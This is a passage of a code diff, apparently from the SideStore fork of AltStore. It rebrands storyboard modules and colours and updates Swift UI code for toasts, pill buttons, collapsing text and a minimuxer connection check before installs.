                                                     <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Why do we need this?" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="p9U-0q-Kn8">
                                                         <rect key="frame" x="0.0" y="0.0" width="343" height="20.5"/>
@@ -198,6 +198,10 @@
                                             </stackView>
                                         </subviews>
                                         <constraints>
+                                            <constraint firstItem="DBk-rT-ZE8" firstAttribute="leading" secondItem="2wp-qG-f0Z" secondAttribute="leadingMargin" id="5AT-nV-ZP9"/>
+                                            <constraint firstAttribute="bottomMargin" secondItem="DBk-rT-ZE8" secondAttribute="bottom" id="HgY-oY-8KM"/>
+                                            <constraint firstAttribute="trailingMargin" secondItem="DBk-rT-ZE8" secondAttribute="trailing" id="VCf-bW-2K4"/>
+                                            <constraint firstItem="YmX-7v-pxh" firstAttribute="top" secondItem="2wp-qG-f0Z" secondAttribute="top" constant="6" id="iUr-Nd-tkt"/>
                                             <constraint firstItem="DBk-rT-ZE8" firstAttribute="top" relation="greaterThanOrEqual" secondItem="YmX-7v-pxh" secondAttribute="bottom" constant="8" symbolic="YES" id="zTU-eY-DWd"/>
                                         </constraints>
                                     </view>
@@ -215,19 +219,15 @@
                         <constraints>
                             <constraint firstAttribute="bottom" secondItem="WXx-hX-AXv" secondAttribute="bottom" id="0jL-Ky-ju6"/>
                             <constraint firstAttribute="leadingMargin" secondItem="YmX-7v-pxh" secondAttribute="leading" id="2PO-lG-dmB"/>
-                            <constraint firstItem="DBk-rT-ZE8" firstAttribute="leading" secondItem="2wp-qG-f0Z" secondAttribute="leadingMargin" id="5AT-nV-ZP9"/>
                             <constraint firstItem="oyW-Fd-ojD" firstAttribute="top" secondItem="zMn-DV-fpy" secondAttribute="top" id="730-db-ukB"/>
-                            <constraint firstItem="2wp-qG-f0Z" firstAttribute="bottomMargin" secondItem="DBk-rT-ZE8" secondAttribute="bottom" id="HgY-oY-8KM"/>
                             <constraint firstItem="zMn-DV-fpy" firstAttribute="trailing" secondItem="oyW-Fd-ojD" secondAttribute="trailing" id="KGE-CN-SWf"/>
                             <constraint firstItem="WXx-hX-AXv" firstAttribute="top" secondItem="mjy-4S-hyH" secondAttribute="top" id="LPQ-bF-ic0"/>
                             <constraint firstItem="zMn-DV-fpy" firstAttribute="trailing" secondItem="WXx-hX-AXv" secondAttribute="trailing" id="MG7-A6-pKp"/>
                             <constraint firstAttribute="trailingMargin" secondItem="YmX-7v-pxh" secondAttribute="trailing" id="O4T-nu-o3e"/>
                             <constraint firstItem="zMn-DV-fpy" firstAttribute="bottom" secondItem="oyW-Fd-ojD" secondAttribute="bottom" id="PuX-ab-cEq"/>
                             <constraint firstItem="oyW-Fd-ojD" firstAttribute="leading" secondItem="zMn-DV-fpy" secondAttribute="leading" id="SzC-gC-Nvi"/>
-                            <constraint firstItem="2wp-qG-f0Z" firstAttribute="trailingMargin" secondItem="DBk-rT-ZE8" secondAttribute="trailing" id="VCf-bW-2K4"/>
                             <constraint firstItem="WXx-hX-AXv" firstAttribute="leading" secondItem="zMn-DV-fpy" secondAttribute="leading" id="d08-zF-5X6"/>
                             <constraint firstItem="2wp-qG-f0Z" firstAttribute="height" secondItem="oyW-Fd-ojD" secondAttribute="height" id="dFN-pw-TWt"/>
-                            <constraint firstItem="YmX-7v-pxh" firstAttribute="top" secondItem="2wp-qG-f0Z" secondAttribute="top" constant="6" id="iUr-Nd-tkt"/>
                             <constraint firstItem="2wp-qG-f0Z" firstAttribute="width" secondItem="oyW-Fd-ojD" secondAttribute="width" id="rYO-GN-0Lk"/>
                         </constraints>
                     </view>
@@ -258,13 +258,13 @@
         <!--How it works-->
         <scene sceneID="dMt-EA-SGy">
             <objects>
-                <viewController storyboardIdentifier="instructionsViewController" hidesBottomBarWhenPushed="YES" id="aFi-fb-W0B" customClass="InstructionsViewController" customModule="AltStore" customModuleProvider="target" sceneMemberID="viewController">
+                <viewController storyboardIdentifier="instructionsViewController" hidesBottomBarWhenPushed="YES" id="aFi-fb-W0B" customClass="InstructionsViewController" customModule="SideStore" customModuleProvider="target" sceneMemberID="viewController">
                     <view key="view" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" id="Otz-hn-WGS">
                         <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
                         <subviews>
                             <stackView opaque="NO" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" axis="vertical" distribution="equalSpacing" translatesAutoresizingMaskIntoConstraints="NO" id="bp6-55-IG2">
-                                <rect key="frame" x="0.0" y="44" width="375" height="564"/>
+                                <rect key="frame" x="0.0" y="64" width="375" height="544"/>
                                 <subviews>
                                     <stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="20" translatesAutoresizingMaskIntoConstraints="NO" id="FjP-tm-w7K">
                                         <rect key="frame" x="16" y="35" width="343" height="95.5"/>
@@ -298,7 +298,7 @@
                                         </subviews>
                                     </stackView>
                                     <stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="20" translatesAutoresizingMaskIntoConstraints="NO" id="LpI-Jt-SzX">
-                                        <rect key="frame" x="16" y="168" width="343" height="95.5"/>
+                                        <rect key="frame" x="16" y="161" width="343" height="95.5"/>
                                         <subviews>
                                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="2" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="0LW-eE-qHa">
                                                 <rect key="frame" x="0.0" y="0.0" width="59" height="95.5"/>
@@ -310,7 +310,7 @@
                                                 <nil key="highlightedColor"/>
                                             </label>
                                             <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="5" translatesAutoresizingMaskIntoConstraints="NO" id="dMu-eg-gIO">
-                                                <rect key="frame" x="79" y="17" width="264" height="61.5"/>
+                                                <rect key="frame" x="79" y="17.5" width="264" height="60.5"/>
                                                 <subviews>
                                                     <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Connect to Wi-Fi and VPN" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.5" translatesAutoresizingMaskIntoConstraints="NO" id="esj-pD-D4A">
                                                         <rect key="frame" x="0.0" y="0.0" width="264" height="20.5"/>
@@ -319,7 +319,7 @@
                                                         <nil key="highlightedColor"/>
                                                     </label>
                                                     <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable SideStore VPN in Wireguard and be able to use Sidestore on the go." textAlignment="natural" lineBreakMode="tailTruncation" numberOfLines="2" baselineAdjustment="alignBaselines" minimumScaleFactor="0.5" translatesAutoresizingMaskIntoConstraints="NO" id="4rk-ge-FSj">
-                                                        <rect key="frame" x="0.0" y="25.5" width="264" height="36"/>
+                                                        <rect key="frame" x="0.0" y="25.5" width="264" height="35"/>
                                                         <fontDescription key="fontDescription" type="system" pointSize="16"/>
                                                         <color key="textColor" white="1" alpha="0.59999999999999998" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                         <nil key="highlightedColor"/>
@@ -329,7 +329,7 @@
                                         </subviews>
                                     </stackView>
                                     <stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="20" translatesAutoresizingMaskIntoConstraints="NO" id="tfb-ja-9UC">
-                                        <rect key="frame" x="16" y="300.5" width="343" height="95.5"/>
+                                        <rect key="frame" x="16" y="287.5" width="343" height="95.5"/>
                                         <subviews>
                                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="3" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="nVr-El-Csi">
                                                 <rect key="frame" x="0.0" y="0.0" width="59" height="95.5"/>
@@ -341,7 +341,7 @@
                                                 <nil key="highlightedColor"/>
                                             </label>
                                             <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="5" translatesAutoresizingMaskIntoConstraints="NO" id="z6Y-zi-teL">
-                                                <rect key="frame" x="79" y="16" width="264" height="64"/>
+                                                <rect key="frame" x="79" y="15.5" width="264" height="64"/>
                                                 <subviews>
                                                     <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Download Apps" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.5" translatesAutoresizingMaskIntoConstraints="NO" id="JeJ-bk-UCA">
                                                         <rect key="frame" x="0.0" y="0.0" width="264" height="20.5"/>
@@ -360,7 +360,7 @@
                                         </subviews>
                                     </stackView>
                                     <stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="20" translatesAutoresizingMaskIntoConstraints="NO" id="X3r-G1-vf2">
-                                        <rect key="frame" x="16" y="433.5" width="343" height="95.5"/>
+                                        <rect key="frame" x="16" y="413.5" width="343" height="95.5"/>
                                         <subviews>
                                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="4" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="i2U-NL-plG">
                                                 <rect key="frame" x="0.0" y="0.0" width="59" height="95.5"/>
@@ -434,7 +434,7 @@
         <!--Refresh AltStore-->
         <scene sceneID="9Vh-dM-OqX">
             <objects>
-                <viewController storyboardIdentifier="refreshAltStoreViewController" id="aoK-yE-UVT" customClass="RefreshAltStoreViewController" customModule="AltStore" customModuleProvider="target" sceneMemberID="viewController">
+                <viewController storyboardIdentifier="refreshAltStoreViewController" id="aoK-yE-UVT" customClass="RefreshAltStoreViewController" customModule="SideStore" customModuleProvider="target" sceneMemberID="viewController">
                     <view key="view" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" id="R83-kV-365">
                         <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
@@ -445,7 +445,7 @@
                             <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="8" translatesAutoresizingMaskIntoConstraints="NO" id="tDQ-ao-1Jg">
                                 <rect key="frame" x="16" y="570" width="343" height="89"/>
                                 <subviews>
-                                    <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="xcg-hT-tDe" customClass="PillButton" customModule="AltStore" customModuleProvider="target">
+                                    <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="xcg-hT-tDe" customClass="PillButton" customModule="SideStore" customModuleProvider="target">
                                         <rect key="frame" x="0.0" y="0.0" width="343" height="51"/>
                                         <color key="backgroundColor" name="SettingsHighlighted"/>
                                         <constraints>
@@ -493,12 +493,12 @@
                 </viewController>
                 <placeholder placeholderIdentifier="IBFirstResponder" id="Chr-7g-qEw" userLabel="First Responder" customClass="UIResponder" sceneMemberID="firstResponder"/>
             </objects>
-            <point key="canvasLocation" x="2967" y="736"/>
+            <point key="canvasLocation" x="3025" y="734"/>
         </scene>
         <!--Select a Team-->
         <scene sceneID="ioQ-WB-CLJ">
             <objects>
-                <viewController storyboardIdentifier="selectTeamViewController" hidesBottomBarWhenPushed="YES" id="kOD-4P-a6L" customClass="SelectTeamViewController" customModule="AltStore" customModuleProvider="target" sceneMemberID="viewController">
+                <viewController storyboardIdentifier="selectTeamViewController" hidesBottomBarWhenPushed="YES" id="kOD-4P-a6L" customClass="SelectTeamViewController" customModule="SideStore" customModuleProvider="target" sceneMemberID="viewController">
                     <tableView key="view" clipsSubviews="YES" contentMode="scaleToFill" alwaysBounceVertical="YES" indicatorStyle="white" dataMode="prototypes" style="grouped" separatorStyle="none" rowHeight="60" estimatedRowHeight="-1" sectionHeaderHeight="18" sectionFooterHeight="18" id="fWW-kX-ifH">
                         <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
@@ -506,11 +506,11 @@
                         <color key="tintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <color key="separatorColor" white="1" alpha="0.25" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <prototypes>
-                            <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" accessoryType="disclosureIndicator" indentationWidth="10" reuseIdentifier="TeamCell" textLabel="6ip-34-gmM" detailTextLabel="knk-Wf-PKf" style="IBUITableViewCellStyleSubtitle" id="qeQ-eb-2SC" customClass="InsetGroupTableViewCell" customModule="AltStore" customModuleProvider="target">
+                            <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" accessoryType="disclosureIndicator" indentationWidth="10" reuseIdentifier="TeamCell" textLabel="6ip-34-gmM" detailTextLabel="knk-Wf-PKf" style="IBUITableViewCellStyleSubtitle" id="qeQ-eb-2SC" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
                                 <rect key="frame" x="0.0" y="55.5" width="375" height="60"/>
                                 <autoresizingMask key="autoresizingMask"/>
                                 <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="qeQ-eb-2SC" id="bT4-Fc-u6I">
-                                    <rect key="frame" x="0.0" y="0.0" width="334" height="60"/>
+                                    <rect key="frame" x="0.0" y="0.0" width="334.5" height="60"/>
                                     <autoresizingMask key="autoresizingMask"/>
                                     <subviews>
                                         <label opaque="NO" multipleTouchEnabled="YES" contentMode="left" insetsLayoutMarginsFromSafeArea="NO" text="Team 1" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" id="6ip-34-gmM">
@@ -550,20 +550,19 @@
                 </viewController>
                 <placeholder placeholderIdentifier="IBFirstResponder" id="yH5-jU-aez" userLabel="First Responder" sceneMemberID="firstResponder"/>
             </objects>
-            <point key="canvasLocation" x="1401" y="734"/>
-
+            <point key="canvasLocation" x="2114" y="734"/>
         </scene>
-</scenes>
-<color key="tintColor" name="Primary"/>
-<resources>
-    <namedColor name="Primary">
-        <color red="0.0040000001899898052" green="0.50199997425079346" blue="0.51800000667572021" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
-    </namedColor>
+    </scenes>
+    <color key="tintColor" name="Primary"/>
+    <resources>
+        <namedColor name="Primary">
+            <color red="0.64313725490196083" green="0.019607843137254902" blue="0.98039215686274506" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+        </namedColor>
         <namedColor name="SettingsBackground">
-            <color red="0.0039215686274509803" green="0.50196078431372548" blue="0.51764705882352946" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+            <color red="0.45098039215686275" green="0.015686274509803921" blue="0.68627450980392157" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
         </namedColor>
         <namedColor name="SettingsHighlighted">
-            <color red="0.0080000003799796104" green="0.32199999690055847" blue="0.40400001406669617" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+            <color red="0.38823529411764707" green="0.011764705882352941" blue="0.58823529411764708" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
         </namedColor>
     </resources>
 </document>

AltStore/Authentication/AuthenticationViewController.swift

@@ -108,11 +108,9 @@ private extension AuthenticationViewController
                 
             case .failure(let error as NSError):
                 DispatchQueue.main.async {
-                    let error = error.withLocalizedFailure(NSLocalizedString("Failed to Log In", comment: ""))
-                    
+                    let error = error.withLocalizedTitle(NSLocalizedString("Failed to Log In", comment: ""))
+
                     let toastView = ToastView(error: error)
-                    toastView.textLabel.textColor = .altPink
-                    toastView.detailTextLabel.textColor = .altPink
                     toastView.show(in: self)
                     self.toastView = toastView
                     

AltStore/Base.lproj/Main.storyboard

@@ -1,9 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="21223" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="wKh-xq-NuP">
+<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="32700.99.1234" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="wKh-xq-NuP">
     <device id="retina4_7" orientation="portrait" appearance="light"/>
     <dependencies>
         <deployment identifier="iOS"/>
-        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="21204"/>
+        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="22684"/>
         <capability name="Named colors" minToolsVersion="9.0"/>
         <capability name="Safe area layout guides" minToolsVersion="9.0"/>
         <capability name="System colors in document resources" minToolsVersion="11.0"/>
@@ -356,8 +356,8 @@
                                                                 <stackView opaque="NO" contentMode="scaleToFill" distribution="equalSpacing" translatesAutoresizingMaskIntoConstraints="NO" id="ewH-gi-pyW">
                                                                     <rect key="frame" x="0.0" y="30.5" width="335" height="17"/>
                                                                     <subviews>
-                                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" verticalCompressionResistancePriority="751" text="Version 4.4.2" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="7E0-TV-G4l">
-                                                                            <rect key="frame" x="0.0" y="0.0" width="84.5" height="17"/>
+                                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" verticalCompressionResistancePriority="751" text="Version 0.5.6" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="7E0-TV-G4l">
+                                                                            <rect key="frame" x="0.0" y="0.0" width="84" height="17"/>
                                                                             <fontDescription key="fontDescription" type="system" pointSize="14"/>
                                                                             <color key="textColor" white="0.66666666666666663" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                                             <nil key="highlightedColor"/>
@@ -596,7 +596,7 @@ World</string>
                     <tabBarItem key="tabBarItem" title="Browse" image="Browse" id="Uwh-Bg-Ymq"/>
                     <toolbarItems/>
                     <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" largeTitles="YES" id="dIv-qd-9L5" customClass="NavigationBar" customModule="SideStore" customModuleProvider="target">
-                        <rect key="frame" x="0.0" y="0.0" width="375" height="96"/>
+                        <rect key="frame" x="0.0" y="20" width="375" height="96"/>
                         <autoresizingMask key="autoresizingMask"/>
                         <color key="tintColor" name="Primary"/>
                     </navigationBar>
@@ -626,7 +626,7 @@ World</string>
                     </tabBarItem>
                     <toolbarItems/>
                     <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" largeTitles="YES" id="CzO-Kt-BlZ" customClass="NavigationBar" customModule="SideStore" customModuleProvider="target">
-                        <rect key="frame" x="0.0" y="0.0" width="375" height="96"/>
+                        <rect key="frame" x="0.0" y="20" width="375" height="96"/>
                         <autoresizingMask key="autoresizingMask"/>
                     </navigationBar>
                     <nil name="viewControllers"/>
@@ -883,7 +883,7 @@ World</string>
                     <navigationItem key="navigationItem" title="App IDs" id="3Co-uv-Fhb">
                         <barButtonItem key="leftBarButtonItem" style="plain" id="Aqs-QK-Ups">
                             <view key="customView" contentMode="scaleToFill" id="p0q-Fg-3Ba">
-                                <rect key="frame" x="16" y="1" width="83" height="42"/>
+                                <rect key="frame" x="16" y="7" width="83" height="42"/>
                                 <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/>
                             </view>
                         </barButtonItem>
@@ -909,7 +909,7 @@ World</string>
                     <tabBarItem key="tabBarItem" title="News" image="News" id="fVN-ed-uO1"/>
                     <toolbarItems/>
                     <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" largeTitles="YES" id="525-jF-uDK" customClass="NavigationBar" customModule="SideStore" customModuleProvider="target">
-                        <rect key="frame" x="0.0" y="0.0" width="375" height="96"/>
+                        <rect key="frame" x="0.0" y="20" width="375" height="96"/>
                         <autoresizingMask key="autoresizingMask"/>
                         <edgeInsets key="layoutMargins" top="8" left="20" bottom="8" right="8"/>
                     </navigationBar>
@@ -928,7 +928,7 @@ World</string>
                 <navigationController automaticallyAdjustsScrollViewInsets="NO" id="IXk-qg-mFJ" sceneMemberID="viewController">
                     <toolbarItems/>
                     <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" largeTitles="YES" id="9sB-f3-Fnk">
-                        <rect key="frame" x="0.0" y="0.0" width="375" height="96"/>
+                        <rect key="frame" x="0.0" y="0.0" width="375" height="108"/>
                         <autoresizingMask key="autoresizingMask"/>
                     </navigationBar>
                     <nil name="viewControllers"/>
@@ -1070,7 +1070,7 @@ World</string>
                 <navigationController automaticallyAdjustsScrollViewInsets="NO" id="Qo4-72-Hmr" sceneMemberID="viewController">
                     <toolbarItems/>
                     <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" largeTitles="YES" id="mcx-oR-qPe">
-                        <rect key="frame" x="0.0" y="0.0" width="375" height="96"/>
+                        <rect key="frame" x="0.0" y="0.0" width="375" height="108"/>
                         <autoresizingMask key="autoresizingMask"/>
                     </navigationBar>
                     <nil name="viewControllers"/>
@@ -1095,13 +1095,13 @@ World</string>
         <image name="News" width="19" height="20"/>
         <image name="Settings" width="20" height="20"/>
         <namedColor name="Background">
-            <color red="0.6431" green="0.0196" blue="0.9804" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+            <color red="0.45098039215686275" green="0.015686274509803921" blue="0.68627450980392157" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
         </namedColor>
         <namedColor name="BlurTint">
-            <color red="1" green="1" blue="1" alpha="0.3" colorSpace="custom" customColorSpace="sRGB"/>
+            <color red="1" green="1" blue="1" alpha="0.30000001192092896" colorSpace="custom" customColorSpace="sRGB"/>
         </namedColor>
         <namedColor name="Primary">
-            <color red="0.6431" green="0.0196" blue="0.9804" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+            <color red="0.64313725490196083" green="0.019607843137254902" blue="0.98039215686274506" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
         </namedColor>
         <systemColor name="systemBackgroundColor">
             <color white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>

AltStore/Browse/BrowseViewController.swift

@@ -8,6 +8,7 @@
 
 import UIKit
 
+import minimuxer
 import AltStoreCore
 import Roxas
 
@@ -113,9 +114,9 @@ private extension BrowseViewController
                 let progress = AppManager.shared.installationProgress(for: app)
                 cell.bannerView.button.progress = progress
                 
-                if let versionDate = app.latestVersion?.date, versionDate > Date()
+                if let versionDate = app.latestSupportedVersion?.date, versionDate > Date()
                 {
-                    cell.bannerView.button.countdownDate = app.versionDate
+                    cell.bannerView.button.countdownDate = versionDate
                 }
                 else
                 {
@@ -264,14 +265,20 @@ private extension BrowseViewController
             previousProgress?.cancel()
             return
         }
-        
+
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         _ = AppManager.shared.install(app, presentingViewController: self) { (result) in
             DispatchQueue.main.async {
                 switch result
                 {
                 case .failure(OperationError.cancelled): break // Ignore
                 case .failure(let error):
-                    let toastView = ToastView(error: error)
+                    let toastView = ToastView(error: error, opensLog: true)
                     toastView.show(in: self)
                 
                 case .success: print("Installed app:", app.bundleIdentifier)

AltStore/Components/CollapsingTextView.swift

@@ -22,7 +22,7 @@ final class CollapsingTextView: UITextView
         }
     }
     
-    var lineSpacing: CGFloat = 2 {
+    var lineSpacing: Double = 2 {
         didSet {
             self.setNeedsLayout()
         }
@@ -34,7 +34,19 @@ final class CollapsingTextView: UITextView
     {
         super.awakeFromNib()
         
-        self.layoutManager.delegate = self
+        self.initialize()
+    }
+    
+    private func initialize()
+    {
+        if #available(iOS 16, *)
+        {
+            self.updateText()
+        }
+        else
+        {
+            self.layoutManager.delegate = self
+        }
         
         self.textContainerInset = .zero
         self.textContainer.lineFragmentPadding = 0
@@ -108,6 +120,25 @@ private extension CollapsingTextView
     {
         self.isCollapsed.toggle()
     }
+    
+    @available(iOS 16, *)
+    func updateText()
+    {
+        do
+        {
+            let style = NSMutableParagraphStyle()
+            style.lineSpacing = self.lineSpacing
+            
+            var attributedText = try AttributedString(self.attributedText, including: \.uiKit)
+            attributedText[AttributeScopes.UIKitAttributes.ParagraphStyleAttribute.self] = style
+            
+            self.attributedText = NSAttributedString(attributedText)
+        }
+        catch
+        {
+            print("[ALTLog] Failed to update CollapsingTextView line spacing:", error)
+        }
+    }
 }
 
 extension CollapsingTextView: NSLayoutManagerDelegate

AltStore/Components/PillButton.swift

@@ -8,6 +8,12 @@
 
 import UIKit
 
+extension PillButton
+{
+    static let minimumSize = CGSize(width: 77, height: 31)
+    static let contentInsets = NSDirectionalEdgeInsets(top: 7, leading: 13, bottom: 7, trailing: 13)
+}
+
 final class PillButton: UIButton
 {
     override var accessibilityValue: String? {
@@ -70,9 +76,7 @@ final class PillButton: UIButton
     }()
     
     override var intrinsicContentSize: CGSize {
-        var size = super.intrinsicContentSize
-        size.width += 26
-        size.height += 3
+        let size = self.sizeThatFits(CGSize(width: Double.infinity, height: .infinity))
         return size
     }
     
@@ -88,6 +92,8 @@ final class PillButton: UIButton
         self.layer.masksToBounds = true
         self.accessibilityTraits.formUnion([.updatesFrequently, .button])
         
+        self.contentEdgeInsets = UIEdgeInsets(top: Self.contentInsets.top, left: Self.contentInsets.leading, bottom: Self.contentInsets.bottom, right: Self.contentInsets.trailing)
+        
         self.activityIndicatorView.style = .medium
         self.activityIndicatorView.isUserInteractionEnabled = false
         
@@ -119,6 +125,15 @@ final class PillButton: UIButton
         
         self.update()
     }
+    
+    override func sizeThatFits(_ size: CGSize) -> CGSize
+    {
+        var size = super.sizeThatFits(size)
+        size.width = max(size.width, PillButton.minimumSize.width)
+        size.height = max(size.height, PillButton.minimumSize.height)
+        
+        return size
+    }
 }
 
 private extension PillButton

AltStore/Components/ToastView.swift

@@ -18,8 +18,17 @@ extension TimeInterval
 
 final class ToastView: RSTToastView
 {
+    static let openErrorLogNotification = Notification.Name("ALTOpenErrorLogNotification")
+
     var preferredDuration: TimeInterval
-    
+
+    var opensErrorLog: Bool = false
+
+    convenience init(text: String, detailText: String?, opensLog: Bool = false) {
+        self.init(text: text, detailText: detailText)
+        self.opensErrorLog = opensLog
+    }
+
     override init(text: String, detailText detailedText: String?)
     {
         if detailedText == nil
@@ -43,53 +52,43 @@ final class ToastView: RSTToastView
             // RSTToastView does not expose stack view containing labels,
             // so we access it indirectly as the labels' superview.
             stackView.spacing = (detailedText != nil) ? 4.0 : 0.0
+            stackView.alignment = .leading
         }
+        self.addTarget(self, action: #selector(ToastView.showErrorLog), for: .touchUpInside)
     }
-    
+
+    convenience init(error: Error, opensLog: Bool = false) {
+        self.init(error: error)
+        self.opensErrorLog = opensLog
+    }
+
     convenience init(error: Error)
     {
         var error = error as NSError
         var underlyingError = error.underlyingError
         
-        var preferredDuration: TimeInterval?
-        
         if
             let unwrappedUnderlyingError = underlyingError,
             error.domain == AltServerErrorDomain && error.code == ALTServerError.Code.underlyingError.rawValue
         {
-            // Treat underlyingError as the primary error.
-            
+            // Treat underlyingError as the primary error, but keep localized title + failure.
+            let nsError = error as NSError
             error = unwrappedUnderlyingError as NSError
+
+            if let localizedTitle = nsError.localizedTitle {
+                error = error.withLocalizedTitle(localizedTitle)
+            }
+            if let localizedFailure = nsError.localizedFailure {
+                error = error.withLocalizedFailure(localizedFailure)
+            }
+
             underlyingError = nil
-            
-            preferredDuration = .longToastViewDuration
         }
-        
-        let text: String
-        let detailText: String?
-        
-        if let failure = error.localizedFailure
-        {
-            text = failure
-            detailText = error.localizedFailureReason ?? error.localizedRecoverySuggestion ?? underlyingError?.localizedDescription ?? error.localizedDescription
-        }
-        else if let reason = error.localizedFailureReason
-        {
-            text = reason
-            detailText = error.localizedRecoverySuggestion ?? underlyingError?.localizedDescription
-        }
-        else
-        {
-            text = error.localizedDescription
-            detailText = underlyingError?.localizedDescription ?? error.localizedRecoverySuggestion
-        }
-        
+        let text = error.localizedTitle ?? NSLocalizedString("Operation Failed", comment: "")
+        let detailText = error.localizedDescription
+
+
         self.init(text: text, detailText: detailText)
-        
-        if let preferredDuration = preferredDuration
-        {
-            self.preferredDuration = preferredDuration
-        }
     }
     
     required init(coder aDecoder: NSCoder) {
@@ -112,6 +111,18 @@ final class ToastView: RSTToastView
     
